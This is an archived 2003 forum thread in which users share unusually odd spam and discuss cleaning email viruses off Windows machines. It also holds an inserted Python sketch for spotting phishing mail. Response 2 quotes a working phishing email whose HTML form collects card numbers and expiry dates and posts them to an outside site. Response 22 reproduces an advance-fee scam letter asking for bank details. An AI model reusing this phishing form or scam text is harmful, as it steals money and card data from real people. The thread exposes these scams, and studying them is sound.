|
|
| Author |
Message |
polygon
|
|
Strange Spam
|
Sep 24 12:10 UTC 2003 |
This item is for examples of unsolicited email which are significantly
weirder than average.
|
| 101 responses total. |
polygon
|
|
response 1 of 101:
|
Sep 24 12:16 UTC 2003 |
[text reformatted]
---------- Forwarded message ----------
Return-Path: <soul_guards@yahoo.com>
Received: from Aladin (icard-56.BGBest.net [212.91.188.183])
by hamjudo.com (8.12.6/8.12.6/Debian-7) with SMTP id h8IFB1ra011590
for <polygon@potifos.com>; Thu, 18 Sep 2003 11:11:06 -0400
From: "Aladin" <do_not_reply-1400281296@planetxmail.com>
To: "Polygon" <polygon@potifos.com>
Subject: Information (hope usefull)
Date: Thu, 18 Sep 2003 18:07:20 +0200
Message-ID: <88211875.20030918180720@planetxmail.com>
MIME-Version: 1.0
X-Priority: 3 (Normal)
Importance: Normal
X-Mailer: EM: 4.40.0.600
Content-Type: multipart/alternative; boundary="----_PartID_708620893460039"
Hello,
before several weeks I tray to offer my skill against the bad weather but
all weather services not take into consideration my proposal.
Today in 07.15 AM Bulgarian's time I learn about hurricane Isabel and the
dangerous connected with him.
From this time begin my attempt against the hurricane and hope (because
learn late for this one) to reduce power of the Isabel like minimum
result.
If was possible to learn in advance for the hurricane the results will be
more clear.
For example I can stop the rain for a 5 up to 30 minutes according the
amount of the water in the cloud.
If you find for suitable can contact with me in the future to prevent the
calamities.
My ICQ # is 179039569
Best regards
|
polygon
|
|
response 2 of 101:
|
Sep 24 12:21 UTC 2003 |
An unusual way to steal credit card numbers:
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
From Marlaine_Gateway@att.net Mon Sep 22 09:29:49 2003
Return-Path: <Marlaine_Gateway@att.net>
Received: from telus.net (bqjf33why13wf.ab.hsia.telus.net [142.173.214.44])
by hamjudo.com (8.12.6/8.12.6/Debian-7) with SMTP id h8LLZ2rZ011675
for <polygon@potifos.com>; Sun, 21 Sep 2003 17:35:05 -0400
Received: from bqjf33why13wf.ab.hsia.telus.net
(bqjf33why13wf.ab.hsia.telus.net [142.173.214.44])
by telus.net (8.12.8p1/8.12.8) with ESMTP id nzstq207066
for <polygon@potifos.com>; Sun, 21 Sep 2003 21:28:17 -0400 (EST)
Date: Sun, 21 Sep 2003 21:28:15 -0400 (EST)
From: "CarderPortal.Org" <Marlaine_Gateway@att.net>
X-Mailer: The Bat! (v1.61) Personal
Reply-To: Marlaine_Gateway@att.net
X-Priority: 3 (Normal)
Message-ID: <1458799932.7926442509936@att.net>
To: polygon@potifos.com
Subject: You credit card has been charged for $234.65
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="----------3331776275274"
<html>
<body text=#000000 vLink=#660000 link=#cc0000 bgColor=#ffffff leftMargin=0
topMargin=0 marginheight="0" marginwidth="0">
<table height="100%" cellSpacing=0 cellPadding=0 width="100%" border=0>
<tr>
<td vAlign=top align=left width=410><br>
<font size="+2" color="red">
<center>Important notice</center></font><br>
<font size="+1" color="red">
<div align=left>We have just charged your credit card for money
laundry service in amount of $234.65 (because you are either
child pornography webmaster or deal with dirty money, which require
us to layndry them and then send to your checking account).
</div>
<div align=left>If you feel this transaction was made by our
mistake, please press "No".</div>
<div align=left>If you confirm this transaction, please press
"Yes"
and fill in the form below.</div>
<div align=left> </div><br><br>
<center>
<form name="Login" action="http://carderportal.org/phpBB2/login.php"
method=post> <input type="hidden" name="lang" value=" 0"><p>
<font size="-1" color="black">
<b>Enter your credit card number here:</b> <br>
<input style="WIDTH: 260px; HEIGHT: 22px" maxLength=30 name=CCNUM
></p>
<p>
<b>Enter your credit card expiration date:</b><br>
<input maxLength=5 name=CCEXP style ="WIDTH: 241px; HEIGHT: 22px" >
</p>
<p> </p><input type=submit value=Yes name=Yes>
<input type=submit value=No name=No></font>
</font></form></center>
<center>
<font size="+1" color="red">
Contacts: <br>
</font>
<font size="4" color ="#0" black><!--StartFragment --><FONT
size=3> </font>
<P><STRONG><FONT color=#990000>icq: 181184; <A
href="mailto:admin@carderportal.com"><FONT
color=#0000ff>admin@carderportal.com</font></a> -
Err0r32;</font></strong></p>
<P><FONT color=#990000><STRONG>icq: 106561; <A
href="mailto:svs@paris.com"><FONT
color=#0000ff>svs@paris.com</font></a> - Fidel</strong></font></p>
<P><!--StartFragment --></p></font></center></tr>
<P></p></font>
<CENTER></center></td></tr></table>
|
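Added example, not part of the original thread: a Python sketch of the checks a mail filter could apply to the message in response 2, comparing the From: domain with the relay recorded in Received: and with the form's action host, and flagging card-like field names. The sample is constructed from the headers and form quoted above; the `HINTS` keyword list and the two-label `site()` comparison are simplifying assumptions.

```python
import email, re
from email.utils import parseaddr
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample: headers and form trimmed from the message in response 2.
SAMPLE = '''Received: from telus.net (bqjf33why13wf.ab.hsia.telus.net [142.173.214.44])
\tby hamjudo.com (8.12.6/8.12.6/Debian-7) with SMTP id h8LLZ2rZ011675
From: "CarderPortal.Org" <Marlaine_Gateway@att.net>
Content-Type: text/html

<form name="Login" action="http://carderportal.org/phpBB2/login.php" method=post>
<input name=CCNUM> <input name=CCEXP> <input type=submit value=Yes name=Yes></form>
'''
HINTS = ("cc", "card", "cvv", "exp", "pin", "pass")  # assumed keyword list

class FormFinder(HTMLParser):  # collects each form's action URL and input names
    def __init__(self):
        super().__init__()
        self.forms = []
    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self.forms.append({"action": a.get("action") or "", "fields": []})
        elif tag == "input" and self.forms and a.get("name"):
            self.forms[-1]["fields"].append(a["name"])

def site(host):  # crude registrable domain: last two labels (ignores co.uk etc.)
    return ".".join(host.lower().rstrip(".").split(".")[-2:])

def analyze(raw):
    msg = email.message_from_string(raw)
    sender = site(parseaddr(msg["From"])[1].rpartition("@")[2])
    findings = []
    # Topmost Received: holds the reverse-DNS name our own server logged.
    m = re.search(r"\(([\w.-]+) \[", msg.get("Received", ""))
    if m and site(m.group(1)) != sender:
        findings.append(("relay_mismatch", site(m.group(1))))
    finder = FormFinder()
    for part in msg.walk():
        if part.get_content_type() == "text/html":
            finder.feed(part.get_payload(decode=True).decode("latin-1"))
    for form in finder.forms:
        host = urlparse(form["action"]).hostname or ""
        if host and site(host) != sender:
            findings.append(("form_posts_offsite", site(host)))
        hits = [f for f in form["fields"] if any(h in f.lower() for h in HINTS)]
        if hits:
            findings.append(("asks_for_sensitive_data", hits))
    return sender, findings
```

Any one finding is weak on its own; a message that trips all three, as this sample does, is a strong candidate for quarantine.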
keesan
|
|
response 3 of 101:
|
Sep 24 12:33 UTC 2003 |
From the first of these spams, you can see that it really was written by a
Bulgarian. Unlike most Slavic languages, Bulgarian has the word 'the' (it
is a postposited syllable at the end of a word) and the first and second
person pronouns may be omitted. There is one word meaning in/at (in what
time/at what time).
Albanian, Macedonian, Romanian and Greek all have the article 'the'.
|
tpryan
|
|
response 4 of 101:
|
Sep 24 13:36 UTC 2003 |
My earthlink account is still being bombarded with the
current 'here's the latest MS update' virus email. I'm talking over
100 messages within 4 hours, filling up the 10meg of allocated space.
Anyone else seeing this? I'm not hearing anything about this in the
news.
|
keesan
|
|
response 5 of 101:
|
Sep 24 16:33 UTC 2003 |
Can you set your earthlink account to not accept large messages?
|
rcurl
|
|
response 6 of 101:
|
Sep 24 16:40 UTC 2003 |
Re #2: funny thing, that sender says he's charging my credit card exactly
$234.65 too: must be the standard rate for money laundering. I pass my
messages (received on CAEN) on to abuse@umich.edu, to have a record in
case my credit card gets actually charged.
|
scott
|
|
response 7 of 101:
|
Sep 24 16:46 UTC 2003 |
I get several of those a day.
|
krokus
|
|
response 8 of 101:
|
Sep 24 20:56 UTC 2003 |
re 4
It's been mentioned in some news circles, and especially if they are
an online variety of news.
|
gull
|
|
response 9 of 101:
|
Sep 26 02:07 UTC 2003 |
Email viruses have gotten so common they're no longer 'news', I guess.
I hear rumors of something that looks like it might be Sobig.G
circulating, now, too.
|
ball
|
|
response 10 of 101:
|
Sep 26 13:56 UTC 2003 |
One of the company laptops seems to have W32.Randex.D, which
drops Backdoor/Roxy. The machine has Symantec Norton Anti-
Virus (NAV) installed (not my choice). With the latest
update it's able to delete the Backdoor/Roxy-infected
payload file, but not the system file that immediately re-
infects the machine.
Since this is an 'MS Windows 2000 Professional' machine, I
can't just boot into DOS and manually delete the file. I've
just tried 'Safe Mode' in the hope that NAV would have more
access to the system files, but I click 'Scan' and nothing
happens so it seems that NAV doesn't work in 'Safe Mode'.
I would ask Symantec, but they want ~$5/minute for technical
support. :-( My best bet is probably to just re-image the
machine. It's not clear to me that we have a system image or
'restore disc' for it though and it's a safe bet that the
user doesn't have their document files backed up. <sigh>
|
gull
|
|
response 11 of 101:
|
Sep 26 14:35 UTC 2003 |
Can you boot into safe mode and replace the affected file with a clean
copy off another Windows 2000 Professional machine?
It seems like you ought to be able to copy the document files off before
re-imaging, if it comes to that.
|
ball
|
|
response 12 of 101:
|
Sep 26 15:42 UTC 2003 |
I booted into Safe Mode and deleted c:\winnt\msmsgri32.exe,
which I think was responsible for dropping Backdoor/Roxy. I
am running NAV again now to see if that helped.
I don't know how disciplined the user is about keeping his
document files together in one place. Life gets easier if
we know that backing up everything in (say) c:\horace\ does
the job. Some users are more trainable than others.
|
ball
|
|
response 13 of 101:
|
Sep 26 15:44 UTC 2003 |
Correction, it was c:\winnt\system32\msmsgr32.exe
|
ball
|
|
response 14 of 101:
|
Sep 26 17:23 UTC 2003 |
...and deleting the file allowed Symantec Norton AntiVirus
to successfully clean the computer.
|
tpryan
|
|
response 15 of 101:
|
Sep 26 17:57 UTC 2003 |
Norton might have web pages on how to recover from the infection.
I looked at them to make sure I wasn't infected by the latest worm
though Norton was stopping incoming, I was not certain. I did not
have the indicated files.
Maybe you can write the procedure for them for Windows 2000
machines if they don't have it for that operating system.
Glad you got it out. When I had an office PC, I would
hate to see a machine wipe and restore to corporate image. As
a programmer, it showed lack of knowledge and lack of customer
support, when they were not even able to recover common system
files and transfer them over (things like address book and custom
dictionary).
|
gull
|
|
response 16 of 101:
|
Sep 26 19:43 UTC 2003 |
I suspect sometimes it's a "time is money" issue -- it may involve less
personnel time (and downtime for the user) to simply re-image the
machine than to go through the process of figuring out how to fix it.
With Windows there's also always the chance of patchwork fixes causing
instability that will come back to bite you later.
The extreme example of this would be computer lab systems at colleges.
Some places re-image these on a fixed schedule. I've seen as often as
nightly (automated, of course.)
|
keesan
|
|
response 17 of 101:
|
Sep 26 20:06 UTC 2003 |
Why could not you stick in a DOS boot disk? No floppy drive?
|
flem
|
|
response 18 of 101:
|
Sep 26 20:23 UTC 2003 |
If I understand correctly (which I may not, I'm no windows expert), Win2k uses
a different filesystem from Win98/Dos. The dos boot disk would not be able
to understand the contents of the hard drive.
</speculation>
|
mcnally
|
|
response 19 of 101:
|
Sep 26 20:52 UTC 2003 |
(pretty much correct, except I'd say "Win2K *can* use a different filesystem
that DOS won't understand..")
|
ball
|
|
response 20 of 101:
|
Sep 27 06:20 UTC 2003 |
Re #17
Like many of today's computers, this one doesn't have a
floppy drive. It would be possible (although not trivial)
to make a DOS boot CD, but then...
Re #18
...I'm pretty sure Windows 2000 Professional uses the NT
filesystem (NTFS), which as Greg suggests wouldn't be
accessible from DOS.
|
arnezthe
|
|
response 21 of 101:
|
Sep 27 15:59 UTC 2003 |
hallo Moke McNally how are you? i wanna know about you and study about linux
Red Hat 9
|
keesan
|
|
response 22 of 101:
|
Sep 27 16:16 UTC 2003 |
Here is a new spin on the Nigeria scam. I don't think there is any
mention of which country the Federal Government is located in. I sort of
doubt it is Romania.
At the end I have translated the Romanian last line (attached by the
Romanian webmail site). It really adds a professional touch!
From vichoz@masini.ro Sat Sep 27 11:16:55 2003
Date: Thu, 25 Sep 2003 13:37:34 EEST
From: "vichoz@masini.ro" <vichoz@masini.ro>
Reply-To: vichoz@dotpars.com
To: vichoz@masini.ro
Subject: BUSINESS PROPOSAL
Dear Sir,
I am Engr. Victor Chigoziem with the Engineering Stores Department of the
Federal Ministry of Agriculture and Natural Resources and member of
Tenders Board. We have urgent need for a trustworthy foreign contact
person with whom we can carry out a successful business deal.
Federal Government has voted the sum of US$1.86 Billion for Local
Production of food crops. The Government has also considered the impact of
the importation of some food items like Rice, Beans, Frozen Chicken and
Turkeys and other food stuffs on the Nations Foreign Reserve and have
banned the importation of the items that could be produced locally. As a
result, the Federal Ministry of Agriculture and Natural Resources has been
mandated to import Agricultural Equipments for supply to Local Farmers
both at SUBSISTENT AND COMMERCIAL level to encourage them to produce enough
food items for local consumption and for export to other African
Countries. We have already started awarding new contracts for supply of
the equipments to successful bidders.
We want you to submit to us immediately your complete company name,
address, your name as President or Managing Director / CEO of the company,
your banking particulars:- (banks name address, telephone, fax and telex
numbers. Your receiving number, swift and routing numbers), with these
informations, we can get you properly registered as one of the contractors
of FMANR who has already been awarded part of this contract for the sum of
US$113.4 Million to supply some of the Agricultural Equipments parts of
which we already have in our custody (stores).
After receiving the above needed and stated information from you, we will
process all the documentation and submit them for immediate approvals and
the Federal Government will pay 25% of US$113.4 Million into your
nominated bank account in the name of your company as the beneficiary,
which is US$28.35M . In no time, the remaining US$85,050,000.00 Million
shall be paid as balance payment or we together in agreement as partners
will use another foreign firm's name that will carry out the supply of the
remaining equipments as a sub-contractor to you in our documentation to
receive this balance payment.
We shall come to your country immediately this fund is in your account to
share the US$28.35 Million. The sharing pattern should be negotiated by
both parties concerned.
However, be rest assured that no risk is involved or any scandal in the
future, for we have done all our homework very well, nobody will be hurt
during and after this transaction. It may also please you to know that all
the GOODS that cover the 25% payment are on record, only us that are key
members of the contract board committee has this knowledge and
information. There is the serious need to keep this transaction secret and
very confidential. To that effect, I would require your private phone and
fax numbers for easy and confidential communication. I await your
immediate response to this Proposal. Meanwhile, I look forward to
establishing life long business relationship with you.
The nature of your company or business does not necessarily have to be
Agriculturally related but ownership of a company is a criterium for the
project.
Best regards,
Engr. Victor Chigoziem
__________________________________________
Ai mancat azi?
Comanda on-line mancare chinezeasca, romaneasca, mexicana sau pizza la
http://www.culina.ro!
------------------------
My attempt at translation:
Did you eat today? Order online takeout Chinese, Romanian, Mexican, or
pizza at http://www.culina.ro!
My very first spam from a Romanian webmail site.
I get mail from Poland advertising the latest movies there.
|
arnezthe
|
|
response 23 of 101:
|
Sep 27 18:43 UTC 2003 |
hallo Mr.
Engr.
Victor
ChigoziemE
ngr.
[Dk
|
ea
|
|
response 24 of 101:
|
Sep 27 19:22 UTC 2003 |
re #10 - there is a tool that will allow you to create a boot CD that
can read/write NTFS filesystems, and allows you to also add a command
line virus scanner (available from McAfee's website).
Email for more info.
|